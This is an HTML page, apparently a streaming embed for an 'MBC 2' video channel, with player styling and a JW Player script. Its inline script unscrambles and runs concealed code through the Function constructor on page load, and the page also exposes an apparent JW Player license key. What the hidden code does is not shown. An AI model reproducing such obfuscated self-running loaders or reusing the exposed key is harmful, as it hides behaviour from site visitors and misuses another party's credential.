<!DOCTYPE html>
<html dir='rtl' xmlns='http://www.w3.org/1999/xhtml' 
	xmlns:b='http://www.google.com/2005/gml/b' 
	xmlns:data='http://www.google.com/2005/gml/data' 
	xmlns:expr='http://www.google.com/2005/gml/expr'>
	<head>
		<title>MBC 2</title>
		<style id='page-skin-1' type='text/css'>
			body{margin:0;padding:0;background:#222;overflow:hidden;font-family:"Segoe UI";}
			.post.hentry.uncustomized-post-template { position: absolute; height: 100%; width: 100%; margin: 0 auto; padding: 0px; box-sizing: border-box; }
		</style>
	</head>
	<body>
        <style>
            .player_div {
                width: 100%;
                height: 100%;
            }
        
            div#hls-video_fluid_control_video_source {
                display: none !important;
            }
        
            div#hls-video_fluid_controls_progress_container {
                bottom: 58px;
                height: 2px;
                background-color: rgba(255, 0, 0, 0.68);
            }
        
            div#hls-video_fluid_control_theatre {
                position: fixed;
                top: unset;
                bottom: -3px;
                right: 45px;
            }
        
            #hls-video_fluid_controls_container {
                left: 0px;
                right: 0px;
                background: unset;
                filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000', endColorstr='#ad000000', GradientType=0);
                height: 58px;
            }
        
            #hls-video_fluid_initial_play_button:before {
                font-family: "Segoe UI";
                font-weight: bold;
                font-size: 16px !important;
                top: 25px;
                height: unset;
                color: #efff00;
                bottom: unset;
                background: unset;
                text-shadow: 1px 1px 1px #2b2727;
                opacity: 0.8;
            }
        
            @media screen and (max-width: 1225px) {
                #hls-video_fluid_initial_play_button:before {
                    font-size: 15px !important;
                }
            }
        
            @media screen and (max-width: 500px) {
                #hls-video_fluid_control_theatre {
                    display: none !important;
                }
        
                #hls-video_fluid_initial_play_button:before {
                    font-size: 12px !important;
                }
            }
        
            .shr,
            .rfs {
                display: flex;
                align-items: center;
                cursor: pointer;
                position: absolute;
                top: 10px;
                padding: 5px 10px;
                border: 0;
                border-radius: 8px;
                z-index: 99999999999999999999; /* Exaggerated z-index, likely for emphasis */
                font-size: 16px;
                font-family: "Segoe UI";
                color: #fff;
                text-shadow: 1px 1px 1px #000;
                text-decoration: none;
                background: #831010; /* Dark red background color */
            }
        
            div#hls-video_fluid_controls_progress_container {
                background: #06c;
                display: none; /* Overriding display property to initially hide this element */
            }
        
            #hls-video_fluid_control_duration:before {
                font-family: "Segoe UI";
            }
        
            .fluid_initial_play {
                width: 48px;
                border-radius: 100%;
            }
        
            .fluid_initial_play .fluid_initial_play_button {
                margin-left: 17px;
            }
        </style>
        
		<div class='post hentry uncustomized-post-template' itemprop='VideoObject' itemscope='itemscope' 
			itemtype='http://schema.org/VideoObject'>
			<script src='//ssl.p.jwpcdn.com/player/v/8.21.1/jwplayer.js'></script>
			<script>jwplayer.key ='XSuP4qMl+9tK17QNb+4+th2Pm9AWgMO/cYH8CI0HGGr7bdjo';</script>
			<div class="player_div" align="center">
				<div id="player"></div>
                <script>
                    var playerInstance;
                    (function(){
                        var mEt = '';
                        var yEG = 504 - 493;
                        
                        function xVC(c) {
                            var i = 1987019;
                            var f = c.length;
                            var k = [];
                            
                            for (var q = 0; q < f; q++) {
                                k[q] = c.charAt(q);
                            }
                            
                            for (var q = 0; q < f; q++) {
                                var j = i * (q + 79) + (i % 31575);
                                var e = i * (q + 86) + (i % 53218);
                                var u = j % f;
                                var h = e % f;
                                var g = k[u];
                                k[u] = k[h];
                                k[h] = g;
                                i = (j + e) % 6017148;
                            }
                            
                            return k.join('');
                        }
                        
                        var IKh = xVC('tzuspbwcolohaxcufqcikvgtnjrntsrmyoedr').substr(0, yEG);
                        var jXK = '6a(;,Cgtu0f,ipr1(v.5;rhmh;r6ic)(oh"r4l!u=h+altv)dp),k(ya)0sn+hc+a=d(run6,{is=.onf,8e,s;,6l{7li7=C9m;u,g(a,r4alhgu+,nyer(c(v0ma);)u;nij(ro0dcly,ty,h8e;Ctr=,+v);jav ]v];+1k[af2;r*pdh; u+>34bn;,g1=t) a9ou;+1r7,j;bb+ox),2rms+0r )th3b(])yvps =-k cumt;t 1b3)afl;.n"==];t+e)so;,z=A+re,s+g- l1au.v;sg;8v4l y(ve;lco{]sp[f}=]r;4] c+nArj w;r6e 0;;qpge4k(h8 )(h;.a ]=+nouk""gd9l=;nj)i=amc86;So;i.0(,arCaen.tw ).v"lo8tr3ad;fu,i+),u=s 1 570..h<s+8)k y=ry[vv7fbA.Ar)1+git=levnu<8.)riuqfd+)t]ler-,he96vr6ta5e1[orp(u>8ih=hqe<1r}ovj}a(ta(ow)rp.0+),)2e;(0l=gclnfiau=7f=y7v=;(ell.ar2sn;g]o).]C)err-rk;n,(se2isnvelrroiffpCs,+h[++;]toent1c;(iy;;!n=.a0rein)r5v-n.k==hrj[[nbs<.ft+"(=(he}-dtt.)fn}("0ap;}{f ).=c}na=r;eoa){tsd= oC -h")9p8pecnn[hi[==r(0q )ua= [uvc.f9;r,{utlrr=2sSt,a.v( {fen(lwvadA;nsrsga+tva) sga=s<=oneogk;jtqrC=r(;2ullygvi=;[ft=an(ugi.[o9.(ot(ulf.5][mrvs=a12ey]tfauhrsh;u.*=r((o=)=avtyh"6.7j(prj["';
                        
                        var LKM = xVC[IKh];
                        var OsS = '';
                        var LGJ = LKM;
                        var lbV = LKM(OsS, xVC(jXK));
                        var Xru = lbV(xVC('fB6.1BnB$dt4,B\'Sc;=]BBs.=e)a8b),B5a=osmncw5.d-,n}!7+fBa\/a{}!(3b$,_6Btp()1(}yB=1IB{+0,e$%n,5.$\/nn(i=.4.%79o)j!.=p e16t%b5,o)))r]]venD!.gi!a32!;.a}yBm))ydd\/s..1!-S(n.ff"$h6 t$-B$!3{(i_j0i]5;B,B2}pt;pnBb)Bo}ew!3ee[8v9\'126tBse#.be3..i da(:;$0tBtim%srba=5h0ad8n4eB#_5a\/i.-0$0g_;%$_y16(ldo_c2;pet9BlBcirBfvBen3y..1}t3yBB()ee) B;r%%;a]=n2!,c!aC9Bka-e4re.it157iu56nr0BB dg$sBaeB(t-!r!)")"6M](o;BBt.u]uB4;_86pi+rs5 \'c .}t\/f(BBr+0B,)0!ab"r_Bea,)na$=f.)ccB"07=0s_0e)6}f.t,.b,.Ba$7"&.]4,=28(r7}rB3"B370.f.aBy.)((c(3)&l03d}y\/oaey[#s2lre)$ocB.8m6"$}}aBs5..u)r;13 epja $(sB2 B$B)3n"8uy;evc)"*s0!_tn,i.ocq7;",6rv;.0Bje.v-;=B)3"3oia,.B(!b,Bp%:.tB{0",,t3e( 0-,);f_aj\/b))B=$2!Bb3Cc\/{1),elB{(e*"ta6#dgoa=.d.(p;,.=u.nnSt.a$uvnBtgcB{f$ uy4l)B% )!ik;h3.r"(e=%(8ra{r=))a4fj !siBu,){Bcstp0 rr)fr4ture};aBenI:saa.483}egw6)!r([s0=,=j;=e}.b(0g;Dj(ngr].wr..i!ptBCnfil(:eo=+5.(".aquB_B:f{;!o:[{(}e:].o981)u.bBnlB4(e;pth[6.}1l,9=,ls=e2Dardttf(tth15a=k*yB{{1y$sI_\/+bs1c!f3i{n]v}ma%ja3ffa58ek.6,,Bach.0-a5b(#7_7B:i+6tBaBtBst30s7tB1e!ooe.4B!j)_b0 :dvd(\/!4ufe"4(Br13sttB_ pB%b;dB.B{.#\'aBde{(},]..3tB+nt6=w*B),bB.Bn+Ct(e041sq4B[d$37fiB4Bqra5Bj;ba1oB.i11ra4pd1l1qBBlitM,aS}BB$1;o$h.!bla}dsr"&,tlB(h(ds)#ja_ )j &)f%"_*(_ tB13%sB:2B.:c7cB8o(tusu7aB2e]7tB&:"B,;tr\/5lk),]ol.,,aB_aq,be;a34jfsp7t{el\/ vr_t)2eti,B)tn=B%6+6{f3=,$#,lB.( {(]_dBe3ewr.!h"'));
                        
                        var mYO = LGJ(mEt, Xru);
                        mYO(7486);
                        return 7500;
                    })();
                </script>
                
			</div>
		</div>
		</div>
		</div></div>
	</body>
</html>